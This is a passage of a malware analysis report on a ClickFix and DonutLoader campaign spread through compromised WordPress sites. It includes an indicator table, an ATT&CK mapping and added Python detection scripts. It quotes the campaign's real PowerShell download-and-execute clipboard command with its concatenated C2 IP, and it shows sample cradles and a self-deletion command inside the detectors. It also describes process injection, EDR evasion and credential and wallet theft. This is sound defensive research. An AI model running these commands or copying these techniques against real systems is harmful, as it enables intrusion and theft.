svchost.exe and chrome.exe, credential harvesting from major browsers and cryptocurrency wallets, C2 beacon communication, and self-deletion. Joe Sandbox independently confirmed a score of 100/100 (Malicious) via YARA, Suricata IDS, and full behavioral analysis.
A second artifact — a heavily obfuscated JavaScript file (payload.js) — is a confirmed component of the same chain: it is served directly from the C2 infrastructure to the infected page and subsequently invoked by one of the downstream PowerShell or injected svchost processes. It delivers a Python 3.12-based second-stage implant with direct syscall EDR evasion and process injection into wab.exe. It is documented in full in Section 4.
Indicators of compromise linked to the same ntdnewtds.shop infrastructure were found across at least three other independently confirmed malicious sites, confirming this is an active, coordinated campaign with broad reach beyond the analyzed sample.
Drive-By Download via Compromised Website
The attack begins when a visitor navigates to the compromised site. A malicious JavaScript dropper is injected directly into the WordPress HTML, disguised as a performance optimizer (window.__performance_optimizer_v6). Upon page load, the dropper decodes two Base64-encoded C2 domain strings at runtime:
A synchronous XMLHttpRequest fetches a remote JavaScript payload from ntdnewtds.shop/jsrepo?rnd=<random>. The Math.random() cache-buster prevents CDN/proxy caching of the payload URL. If the primary C2 fails, the dropper falls back to dnsnewtds.shop. The fetched remote script is then injected into the page's <head> as a dynamic <script> element and executed immediately in the victim's browser.
A second script block — a 1.26 MB heavily obfuscated JavaScript blob (_0x59bb, 17,914-element string array, custom rotation cipher) — is also present in the page and is consistent with fingerprinting or secondary payload delivery functionality. Its full behavior could not be statically decoded.
T1189 Drive-by Compromise · T1059.007 JS Interpreter · T1027 Obfuscation
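A defender-side check for the first stage described above, added here as an example and not taken from the page or from the campaign's own code: it decodes every atob() literal found in page markup, compares the result with the two C2 domains listed in the IoC table, and looks for the behavioural pattern the write-up describes (synchronous XMLHttpRequest, Math.random() cache-buster, dynamically appended script element, the window.__performance_optimizer_v6 marker). The page fragment it runs on is constructed for the example and carries only those indicators with the surrounding logic elided; the function names are assumptions.

```python
import base64
import binascii
import re

# C2 domains from the IoC table on this page.
KNOWN_C2_DOMAINS = {"ntdnewtds.shop", "dnsnewtds.shop"}

# Constructed, non-functional page fragment containing only the indicators the
# scanner keys on; it is not the dropper from the compromised site, and the
# logic between the indicators is elided.
SAMPLE_HTML = """
<script>
window.__performance_optimizer_v6 = (function () {
  var a = atob("bnRkbmV3dGRzLnNob3A=");
  var b = atob("ZG5zbmV3dGRzLnNob3A=");
  /* ... */
  x.open("GET", "https://" + a + "/jsrepo?rnd=" + Math.random(), false);
  /* ... */
  var s = document.createElement("script");
  document.head.appendChild(s);
})();
</script>
"""

B64_LITERAL = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]{8,})["']\s*\)""")
DOMAIN = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$")
SYNC_XHR = re.compile(r"\.open\(.*?,\s*false\s*\)")
DYN_SCRIPT = re.compile(r"""createElement\(\s*["']script["']""")


def decode_atob_literals(html):
    """Decode every atob("...") literal and keep the ones that look like hostnames."""
    found = set()
    for lit in B64_LITERAL.findall(html):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 / not text: ignore
        if DOMAIN.match(text.lower()):
            found.add(text.lower())
    return found


def scan_page(html):
    """Collect the static indicators of the dropper pattern from one page."""
    domains = decode_atob_literals(html)
    return {
        "decoded_domains": domains,
        "known_c2_hits": domains & KNOWN_C2_DOMAINS,
        "sync_xhr": SYNC_XHR.search(html) is not None,
        "cache_buster": "rnd=" in html and "Math.random()" in html,
        "dynamic_script": DYN_SCRIPT.search(html) is not None,
        "marker": "__performance_optimizer_v6" in html,
    }


def verdict(findings):
    """A known C2 hit is conclusive; otherwise require the behavioural trio."""
    if findings["known_c2_hits"]:
        return "malicious"
    if findings["sync_xhr"] and findings["dynamic_script"] and findings["decoded_domains"]:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    f = scan_page(SAMPLE_HTML)
    print(verdict(f), sorted(f["decoded_domains"]))
```

The base64 decode is deliberately strict (validate=True) so that arbitrary quoted strings do not produce noise; the behavioural trio alone only yields "suspicious", because synchronous XHR plus script injection also occurs in legitimate loaders, and an unknown decoded hostname is what should be pivoted on for enrichment.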
Fake Cloudflare CAPTCHA + Clipboard Hijacking
The remotely fetched JavaScript renders a convincing fake Cloudflare "Verify you are human" CAPTCHA within the page. The CAPTCHA UI instructs the visitor to press Win + R, paste from clipboard, and click OK — a social engineering technique to trigger PowerShell execution without the browser having direct shell access.
Simultaneously, the script silently writes the following obfuscated PowerShell command to the victim's clipboard via the Clipboard API:
The IP address 178.16.52.232 is broken into string concatenation fragments to evade static pattern matching in email security gateways and browser-based heuristics. irm (Invoke-RestMethod) fetches the next-stage payload; iex (Invoke-Expression) executes whatever content is returned, with errors suppressed via 2>$null.
T1204.001 Malicious User Execution · T1115 Clipboard Data · T1036 Masquerading
Obfuscated PowerShell — First-Stage Payload Download
When the victim executes the Run dialog command, PowerShell (PID 7408) is spawned. The command reassembles the target IP at runtime and calls Invoke-RestMethod against http://178.16.52.232/. The content returned is immediately passed to Invoke-Expression for in-memory execution — no file is written to disk at this stage.
This download-and-execute cradle spawns a child PowerShell process (PID 4908) that proceeds to fetch the second-stage payload:
Both C2 servers at this stage are on ASN 202412 (OMEGATECH, SC). Avira URL Cloud flagged 178.16.52.232 as malware. Note: sandbox-reported ASN attribution (JANET Jisc, ASN 786) reflects spoofed origin data — origin monitoring confirms actual hosting on AS202412.
T1059.001 PowerShell · T1140 Decode at Runtime · T1562.001 Impair Defenses
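The clipboard payload and the first-stage cradle both hide the C2 address behind PowerShell string concatenation, which defeats a plain substring match on the IP. The following Python, added here as an example and not code from the report or from the malware, folds 'a'+'b' and ('x') back into a single literal until nothing changes, then matches the recovered address against the IP indicators in the IoC table and flags the download-and-execute pair. The first sample command line is the clipboard payload quoted in the IoC table; the other two event lines are constructed (the report describes the stage-2 fetch but does not quote its exact command line), and the event field names are assumptions.

```python
import re

# IP indicators from the IoC table on this page.
KNOWN_IPS = {"178.16.52.232", "158.94.208.92", "158.94.208.104"}

# Constructed command-line telemetry. Event 7408 carries the clipboard payload
# quoted on this page; 4908 and 1234 are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 7408, "cmd": "powershell \"Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null\""},
    {"pid": 4908, "cmd": "powershell -c \"iex (Invoke-WebRequest 'http://158.94.208.92/' -UseBasicParsing)\""},
    {"pid": 1234, "cmd": "powershell -c \"Get-ChildItem 'C:\\Users' | Measure-Object\""},
]

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'a' + 'b'
GROUP = re.compile(r"(?<!\w)\(\s*('[^']*')\s*\)")           # ('x') but not f('x')
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOAD = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)


def fold_strings(cmd, max_rounds=50):
    """Collapse single-quoted concatenations and redundant parentheses to a fixed point."""
    for _ in range(max_rounds):
        new = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
        new = GROUP.sub(r"\1", new)
        if new == cmd:
            return cmd
        cmd = new
    return cmd  # gave up after max_rounds; return the partially folded line


def analyze(event):
    """Normalise one command line and explain why it is (or is not) alerting."""
    folded = fold_strings(event["cmd"])
    ips = set(IPV4.findall(folded))
    ioc_hits = ips & KNOWN_IPS
    cradle = DOWNLOAD.search(folded) is not None and EXECUTE.search(folded) is not None
    reasons = []
    if cradle:
        reasons.append("download-and-execute cradle")
    if ioc_hits:
        reasons.append("known C2 address: " + ", ".join(sorted(ioc_hits)))
    if folded != event["cmd"]:
        reasons.append("string concatenation folded")
    if "2>$null" in folded:
        reasons.append("error output suppressed")
    return {"pid": event["pid"], "folded": folded, "ips": ips,
            "alert": cradle or bool(ioc_hits), "reasons": reasons}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze(ev)
        print(r["pid"], "ALERT" if r["alert"] else "ok", r["folded"], r["reasons"])
```

The lookbehind in GROUP is what keeps irm('...') intact while stripping the grouping parentheses around it; without it the fold would produce irm'178.16.52.232' and the cradle regex would still fire, but the normalised line would no longer be valid PowerShell for an analyst to read. Double-quoted strings, -join and format-operator tricks are not handled here and would need their own rules.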
Compile-After-Delivery — Malicious C# DLL
The payload downloaded from 158.94.208.92 includes malicious C# source code. Rather than dropping a pre-compiled binary — which would be trivially flagged — the attacker delivers source and compiles it on the victim machine at runtime using the legitimate Windows tool csc.exe (PID 7556).
The compiler input is written to disk as %TEMP%\tr0oowwq.cmdline, and the output is the DLL tr0oowwq.dll (PE32 .NET assembly, 3,584 bytes). This file is detected as TR/Rozena.Gen by Avira and represents the actual credential-stealing implant.
Compile-after-delivery is a known AV-evasion technique: the final binary never exists on disk before compilation, frustrating signature-based detection that scans downloaded files.
T1027.004 Compile After Delivery · T1036.005 Masquerade Filename
PE Injection into svchost.exe + chrome.exe
PowerShell (PID 7408) uses WriteProcessMemory and CreateRemoteThread to inject the compiled PE payload into the legitimate Windows service host process svchost.exe at base address 0x2189A740000. The injected svchost.exe then serves as the primary execution environment for the malicious payload, inheriting the process's trust level and evading process-based detection heuristics.
From within the injected svchost.exe context, a second injection is performed into chrome.exe at base address 0x2A1C94D0000, enabling direct access to browser memory — facilitating credential and cookie extraction without needing to read encrypted credential stores from disk in all cases.
DLL load proxying of wininet.dll and mscoree.dll from RWX memory regions is also present, suggesting additional hook evasion or capability loading.
T1055 Process Injection · T1574 Hijack Execution Flow
Credential Theft, Wallet Targeting, C2 Beacon, and Self-Deletion
The injected svchost.exe performs the following post-exploitation activities:
- Browser Credential Theft: Accesses Chrome History, Chrome Cookies (via Windows Restart Manager abuse to unlock the live Cookies SQLite file), and Firefox key4.db (the Firefox master password store).
- Cryptocurrency Wallet Targeting: Enumerates and targets Electrum wallet files at %AppData%\Roaming\Electrum\wallets and Jaxx IndexedDB at com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb.
- C2 Communication: DonutLoader beacons to 158.94.208.104:80 over plain HTTP, confirmed by Suricata ETPRO rule 2867081 ("DonutLoader Requesting Additional Payload"). This server is on AS202412 (OMEGATECH, SC) — sandbox-reported ASN 786 (JANET Jisc) reflects spoofed origin data.
- Sandbox Detection: WMI query SELECT Name, CurrentHorizontalResolution, CurrentVerticalResolution FROM Win32_VideoController is executed to detect virtual machine environments before proceeding.
- Self-Deletion: After payload execution, the implant removes itself via cmd.exe /C ping 1.0.0.1 & del "C:\Windows\system32\svchost.exe". The ping introduces a timing delay before the delete to ensure the process has exited.
T1555.003 Browser Credentials · T1005 Local Data · T1071.001 Web Protocol C2 · T1070.004 File Deletion
payload.js (SHA256: 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9) is a confirmed component of the primary attack chain. It is loaded onto the infected page directly from C2 infrastructure and subsequently invoked by a downstream PowerShell process or injected svchost instance. Sandbox analysis results: Joe Sandbox webid 1892677, Score: 100/100. Confidence rating is 7/10 due to absence of an exact hash match in sandbox records and incomplete static deobfuscation of the RC4+Base64 string array — behavioral conclusions are inferred from a closely matched sample.
payload.js uses obfuscator.io-style string-array obfuscation: 17,914 Base64+RC4-encoded elements, hex variable names (_0x59bb, _0xc62d84), array rotation value 324,980, and an anti-debug/anti-tamper loop using constructor/apply/RegExp DevTools detection. The decode function _0x5656(index, key) applies RC4 decryption to Base64-decoded elements at runtime.
Before proceeding, the dropper reads the registry key HKCU\Control Panel\International\Geo Nation — a country-awareness check consistent with targeted malware that skips execution in certain regions. It also queries WMI and COM objects (WBEM Locator, WSH Shell) for environmental fingerprinting.
Execution proceeds by spawning rundll32.exe shell32.dll,ShellExec_RunDLL powershell.exe -EncodedCommand <base64> — a living-off-the-land proxy execution technique that hides PowerShell behind a trusted Windows binary.
The Base64-decoded PowerShell command executes hidden (-WindowStyle Hidden) with RemoteSigned policy and immediately disables SSL certificate validation via ServerCertificateValidationCallback={$true}. TLS 1.2 is explicitly set. A spoofed Mozilla/Chrome User-Agent and Referer: https://www.filemail.com/ header are set before downloading python312x64.zip (~14.5 MB) from:
The archive is extracted to %APPDATA%\Roaming\Templates\python312x64\, then pythonw.exe Protected.py is launched. The ZIP is deleted after extraction. A parallel execution chain using SyncAppvPublishingServer LOLBin is also spawned.
Protected.py (62 KB, obfuscated, SHA256: 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896) is executed by the bundled Python 3.12 runtime. A full PyCryptodome suite is dropped alongside it (AES, RSA, ECC, ChaCha20, Blowfish, DES, Salsa20), indicating cryptographic C2 communication or data encryption capability in the final payload — the exact usage is not confirmed by the available evidence.
Three identical malicious PE32+ executables (wc7F65.tmp, wc9E28.tmp, wcED47.tmp, 307 KB each) are dropped to %TEMP%, loaded into memory, then deleted from disk — leaving only in-memory artifacts. All three are detected by Avira (HEUR/AGEN.1318544) and ReversingLabs (34%).
Process injection targets wab.exe (Windows Address Book, three instances PIDs 1752, 3152, 5032) via NtMapViewOfSection (read-only DLL mapping) and NtSetContextThread (thread register hijacking). Direct syscalls (NtCreateFile, NtReadFile, NtWriteFile from address 0x180076169) bypass EDR user-mode hooks entirely. A custom stack switch further evades stack trace analysis by security products.
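Several of the steps described in this report (csc.exe compiling a .cmdline from %TEMP% under PowerShell, the ping-then-del self-deletion, rundll32 ShellExec_RunDLL proxying an encoded PowerShell command, and pythonw.exe running from %APPDATA%\Roaming\Templates) are process-lineage patterns rather than content signatures, so they are best caught by joining each process-creation event to its parent. The rules below are an added example, not the report's own detection content, and run over constructed Sysmon-style events. The event list, PIDs, the user name in the paths and the encoded-command stub are all made up for the example; the technique IDs are the MITRE ATT&CK IDs used in this report plus T1059.006 (Python) for the interpreter rule.

```python
import base64
import re


def encode_ps(script):
    """PowerShell -EncodedCommand takes the base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed stub: only the marker named in the write-up (certificate
# validation disabled), not the real downloader script.
ENCODED_STUB = encode_ps("[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (Sysmon Event ID 1 style, minimal fields).
# PIDs, the user name and exact command lines are made up; only the fragments
# the rules key on are modelled on the behaviour described on this page.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": PS_IMAGE, "cmd": "powershell.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmd": r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\tr0oowwq.cmdline"'},
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /C ping 1.0.0.1 & del "C:\Windows\system32\svchost.exe"'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": "rundll32.exe shell32.dll,ShellExec_RunDLL powershell.exe -EncodedCommand " + ENCODED_STUB},
    {"pid": 600, "ppid": 500, "image": PS_IMAGE,
     "cmd": "powershell.exe -WindowStyle Hidden -EncodedCommand " + ENCODED_STUB},
    {"pid": 700, "ppid": 600, "image": r"C:\Users\u\AppData\Roaming\Templates\python312x64\pythonw.exe",
     "cmd": "pythonw.exe Protected.py"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted prefixes of the flag.
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def image_name(ev):
    return ev["image"].rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_compile_after_delivery(ev, parent):
    """csc.exe spawned by PowerShell, compiling a .cmdline response file from a temp path."""
    return (image_name(ev) == "csc.exe" and parent is not None
            and image_name(parent).startswith("powershell")
            and re.search(r"\\temp\\[^\s\"]+\.cmdline", ev["cmd"], re.I) is not None)


def rule_self_delete(ev):
    """cmd.exe using ping as a sleep before deleting a file."""
    return image_name(ev) == "cmd.exe" and re.search(r"\bping\b.*&\s*del\b", ev["cmd"], re.I) is not None


def rule_rundll32_proxy(ev, parent):
    """powershell.exe whose parent is rundll32 invoking shell32!ShellExec_RunDLL."""
    return (image_name(ev).startswith("powershell") and parent is not None
            and image_name(parent) == "rundll32.exe"
            and "shellexec_rundll" in parent["cmd"].lower())


def rule_interpreter_from_appdata(ev):
    """Python interpreter executing from the Templates folder under roaming AppData."""
    return (image_name(ev) in {"python.exe", "pythonw.exe"}
            and re.search(r"\\appdata\\roaming\\templates\\", ev["image"], re.I) is not None)


def evaluate(events):
    """Return (pid, technique, detail) for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        if rule_compile_after_delivery(ev, parent):
            alerts.append((ev["pid"], "T1027.004", "csc.exe compiling a .cmdline from a temp path under PowerShell"))
        if rule_self_delete(ev):
            alerts.append((ev["pid"], "T1070.004", "ping-delay then del self-deletion"))
        if rule_rundll32_proxy(ev, parent):
            detail = "rundll32 ShellExec_RunDLL -> powershell"
            decoded = decode_encoded_command(ev["cmd"])
            if decoded and "ServerCertificateValidationCallback" in decoded:
                detail += "; encoded command disables TLS certificate validation"
            alerts.append((ev["pid"], "T1218.011", detail))
        if rule_interpreter_from_appdata(ev):
            alerts.append((ev["pid"], "T1059.006", "Python interpreter launched from AppData\\Roaming\\Templates"))
    return alerts


if __name__ == "__main__":
    for pid, technique, detail in evaluate(EVENTS):
        print(pid, technique, detail)
```

Parent lookup by PID is only sound within one host's event stream and a short time window (PIDs are reused); a production rule would key on the ProcessGuid that Sysmon provides. Decoding the encoded command inside the rule, rather than matching on the base64 text, is what lets the same rule catch any re-encoding of the script.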
| Type | Indicator | Status | Context |
|---|---|---|---|
| DOMAIN | ntdnewtds.shop | Neutralized | Primary C2 injector domain — Base64-decoded from HTML dropper; confirmed malicious (20 Joe Sandbox hits, DonutLoader) · CLIENTHOLD / SERVERHOLD — suspended by NameSilo (Ticket #32976692, 2026-05-14) |
| DOMAIN | dnsnewtds.shop | Neutralized | Fallback C2 injector domain — Base64-decoded from HTML dropper · CLIENTHOLD / SERVERHOLD — suspended by NameSilo (Ticket #32976692, 2026-05-14) |
| URL | https://ntdnewtds.shop/jsrepo?rnd=<random> | Neutralized | Primary remote JS payload URL with Math.random() cache-buster · non-resolving (CLIENTHOLD) |
| URL | https://dnsnewtds.shop/jsrepo?rnd=<random> | Neutralized | Fallback remote JS payload URL · non-resolving (CLIENTHOLD) |
| IP | 178.16.52.232 | Malicious | Stage 1 PS payload server (DUSNET-ASDE, Germany) — Avira: malware |
| IP | 158.94.208.92 | Malicious | Stage 2 PS payload server (AS202412, OMEGATECH SC) — sandbox ASN 786 reflects spoofed origin |
| IP | 158.94.208.104 | Malicious | DonutLoader C2 beacon server — Suricata ETPRO rule 2867081, port 80 |
| IP | 91.92.243.161 | Suspicious | THEZONEBG (Bulgaria) — contacted during analysis, role unconfirmed |
| SHA256 | 7c8408456d36743beffffae6bbfa896ec0308f74ce849cd44882ab9d41e17d96 | Malicious | tr0oowwq.dll — TR/Rozena.Gen compiled credential stealer |
| SHA256 | cdb6e4c7c6a93f73bbe632658ea30c18326474f24ecaae64f71cf738292b2c93 | Malicious | tr0oowwq.cmdline — .NET compiler input file dropped to %TEMP% |
| SHA256 | 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 | Malicious | Obfuscated JS file — main page artifact (1.26 MB _0x59bb block) |
| CLIPBOARD | powershell "Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null" | Malicious | ClickFix clipboard payload — copied to victim by malicious JS |
| REGISTRY | HKCU\Google\Chrome\Default\Network\Cookies | Targeted | Chrome cookie store — accessed via Windows Restart Manager abuse |
| FILE | %TEMP%\tr0oowwq.dll / .cmdline | Malicious | Compile-after-delivery artifacts dropped to temp directory |
| SHA256 | d49cec3251ccfdf61d73533596de85e2ece3b7878a11c022a520d3404f8166c9 | Malicious | wc7F65.tmp / wc9E28.tmp / wcED47.tmp (identical) — payload.js chain component, dropped to %TEMP% and deleted post-load |
| URL | https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIes... | Malicious | python312x64.zip download URL — payload.js chain component, stage 2 downloader |
| SHA256 | 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 | Malicious | Protected.py — obfuscated Python second-stage implant |
| SIGMA | Suricata ETPRO 2867081 | Triggered | "DonutLoader Requesting Additional Payload" — 158.94.208.104:80 |

| Tactic | Technique ID | Technique | Evidence |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | Compromised WordPress site injected with malicious JS dropper fetching from ntdnewtds.shop |
| Execution | T1204.001 | User Execution: Malicious Link | ClickFix social engineering: fake CAPTCHA instructs Win+R → paste → OK |
| Execution | T1059.001 | PowerShell | Clipboard payload → iex(irm('178.16.52.232')); child PS → Invoke-WebRequest + iex against 158.94.208.92 |
| Execution | T1059.007 | JavaScript | Malicious JS dropper synchronously fetches and executes remote JS via XHR + dynamic script injection |
| Execution | T1027.004 | Compile After Delivery | Malicious C# compiled at runtime via csc.exe from tr0oowwq.cmdline → tr0oowwq.dll |
| Defense Evasion | T1027 | Obfuscated Files | Base64 C2 domains; 1.26 MB custom string-array JS; PowerShell string concat to hide IPs |
| Defense Evasion | T1055 | Process Injection | PE injected into svchost.exe (0x2189A740000) and chrome.exe (0x2A1C94D0000) via WriteProcessMemory + CreateRemoteThread |
| Defense Evasion | T1070.004 | File Deletion | Self-deletion via cmd /C ping 1.0.0.1 & del svchost.exe; wc*.tmp deleted post-memory-load |
| Defense Evasion | T1497.001 | System Checks (Sandbox) | WMI Win32_VideoController query for VM resolution detection |
| Defense Evasion | T1574 | Hijack Execution Flow | DLL proxying of wininet.dll / mscoree.dll from RWX memory; rundll32 proxy exec (payload.js chain) |
| Defense Evasion | T1106 | Native API (Direct Syscalls) | payload.js chain: NtCreateFile, NtReadFile, NtWriteFile from 0x180076169 bypass EDR user-mode hooks |
| C2 | T1071.001 | Web Protocols | DonutLoader HTTP beacon to 158.94.208.104:80; python312x64.zip over HTTPS TLS 1.2 |
| C2 | T1102 | Web Service | Math.random() cache-buster on C2 URLs evades proxy/CDN caching of remote payloads |
| Credential Access | T1555.003 | Browser Credentials | Chrome History, Cookies (Restart Manager abuse), Firefox key4.db |
| Collection | T1115 | Clipboard Data | clipboard.writeText() injects PS payload to victim clipboard as part of ClickFix attack |
| Collection | T1005 | Data from Local System | Electrum wallets (%AppData%\Roaming\Electrum\wallets), Jaxx IndexedDB |
| Discovery | T1614.001 | System Language Discovery | payload.js chain reads HKCU\Control Panel\International\Geo Nation — country-aware execution |
| Execution | T1218.011 | Rundll32 Proxy Execution | payload.js: WScript → rundll32.exe shell32.dll,ShellExec_RunDLL → powershell.exe |
Following coordinated abuse reporting, NameSilo placed both ntdnewtds.shop and dnsnewtds.shop on CLIENTHOLD / SERVERHOLD status (Ticket #32976692, 2026-05-14). Both domains are non-resolving. With both the primary and fallback C2 endpoints suspended, the synchronous XHR call in the tji-mu-js dropper fails on every infected page, so the malware chain is currently non-functional end-to-end: no remote JS payload can be fetched or executed regardless of which compromised site a visitor lands on. Note that CLIENTHOLD does not remove the injected dropper code from compromised WordPress sites — the chain may re-activate if the C2 infrastructure is re-registered or migrated to new domains.
ntdnewtds.shop dropper infrastructure operating across at least three other WordPress/WooCommerce sites (Joe Sandbox webids: 1911979, 1910694, 1893314), all scoring 100/100 Malicious with identical DonutLoader/ClickFix signatures. This indicates an active, multi-target campaign using shared C2 infrastructure, not an isolated incident. The site under analysis is one of multiple confirmed victims. No conclusions are drawn regarding campaign attribution, threat actor identity, or targeting intent beyond what the sandbox data directly supports.
Related confirmed victims:
- rangerfirearmsoftexas.com — webid 1911979 · Score 100 · DonutLoader / phis.troj.expl.evad
- thecleaninggurus.co.uk — webid 1910694 · Score 100 · DonutLoader / phis.troj.expl.evad
- porchlighthealth.com — webid 1893314 · Score 100 · DonutLoader / troj.spyw.expl.evad